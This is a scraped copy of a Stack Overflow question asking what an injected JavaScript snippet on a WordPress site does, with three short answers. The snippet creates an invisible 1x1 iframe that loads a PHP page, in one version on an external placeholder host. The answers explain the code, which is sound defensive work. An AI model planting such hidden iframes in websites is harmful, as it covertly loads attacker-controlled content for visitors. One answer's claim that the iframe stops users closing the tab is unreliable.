admin管理员组

文章数量:1402129

What exactly is this malicious javascript code doing?

(function () {
    var qk = document.createElement('iframe');

    qk.src = '/wp-includes/dtd.php';
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();

The website at /wp-includes/dtd.php just returns OK.

What exactly is this malicious javascript code doing?

(function () {
    var qk = document.createElement('iframe');

    qk.src = 'http://xxx.tld/wp-includes/dtd.php';
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();

The website at http://xxx.tld/wp-includes/dtd.php just returns OK.

  • javascript
Share Improve this question edited Dec 9, 2013 at 19:20 asked Apr 5, 2013 at 3:27 user1529891user1529891
Add a ment  | 

3 Answers 3

Reset to default 5

It is:

(function () {
    var qk = document.createElement('iframe');  // creating an iframe

    qk.src = 'http://xxx.tld/wp-includes/dtd.php';  // pointing it at a webpage

    /*
    making the iframe only take up a 1px by 1px square
    in the top left-hand corner of the web page it is injected into
    */
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    /*
    Adding the iframe to the DOM by creating a <div> with an ID of "qt"
    (If the div has not been created already)
    */    
    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();

When the iframe is injected into the DOM the browser will make a request to http://xxx.tld/etc. It is most likely doing this to track hits on your site.

It opens an iframe and runs a php script.

Which probably contains who knows what.

Also it appears to require the existence of a div with the id of qk. Perhaps to inject other bad code.

It is setting the width and height to 1 pixel, therefore stopping you closing the tab. It is also setting an iframe to that website which will probably set a cookie to track you.

本文标签: Malicious JavaScript codeStack Overflow

版权声明:本文标题:Malicious JavaScript code - Stack Overflow 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.betaflare.com/web/1744344000a2601647.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。